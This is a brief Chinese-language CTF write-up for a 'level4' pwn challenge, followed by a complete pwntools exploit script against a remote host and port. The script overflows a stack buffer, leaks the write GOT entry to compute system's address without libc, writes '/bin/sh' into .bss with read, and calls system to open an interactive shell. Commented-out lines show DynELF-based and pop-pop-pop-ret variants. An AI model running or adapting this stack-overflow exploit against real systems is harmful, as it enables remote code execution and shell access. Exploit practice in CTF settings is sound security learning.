這道題在沒libc的情況下考洩露地址，兩個方法，一個read之後直接pop三個棧引數再返回system,另一個重新返回vulnerable，只不過read(8位元組)，所以是send，不是sendline啊

另外一個大坑點在dynelf的使用，只能通過它洩漏偏移，然後用不帶它的再寫一遍

傳說中的不用libc的另一方法http://www.cnblogs.com/wangaohui/p/5123992.html

from pwn import *

p=remote('218.2.197.235',20433)
elf=ELF('./level4')
write_plt=elf.symbols['write']
read_plt=elf.symbols['read']
vul=0x0804844B
bss=0x0804A024
def leak(add):
        payload='A'*(0x88+4)+p32(write_plt)+p32(vul)+p32(1)+p32(add)+p32(4)
        p.sendline(payload)
        addc=p.recv(4)
        return addc
#d = DynELF(leak, elf=ELF('./level4'))

#system_addr = d.lookup('system', 'libc')
#print "system_addr=" + hex(system_addr)
#payload='A'*(0x88+4)+p32(read_plt)+p32(vul)+p32(0)+p32(bss)+p32(8)
#p.sendline(payload)
#p.sendline('/bin/sh\0')
#payload='A'*(0x88+4)+p32(system_addr)+p32(vul)+p32(bss)
#p.sendline(payload)
#p.interactive()
wr=leak(elf.got['write'])
offset=-0x8ab00
system_addr=u32(wr)+offset
#pppr = 0x08048509

#payload='A'*(0x88+4)+p32(read_plt)+p32(pppr)+p32(0)+p32(bss)+p32(8)+p32(system_addr) + p32(vulfun_addr) + p32(bss)

#p.sendline(payload)
#p.send("/bin/sh\0")
payload='A'*(0x88+4)+p32(read_plt)+p32(vul)+p32(0)+p32(bss)+p32(8)
p.sendline(payload)
p.send('/bin/sh\0')
payload='A'*(0x88+4)+p32(system_addr)+p32(vul)+p32(bss)
p.sendline(payload)
p.interactive()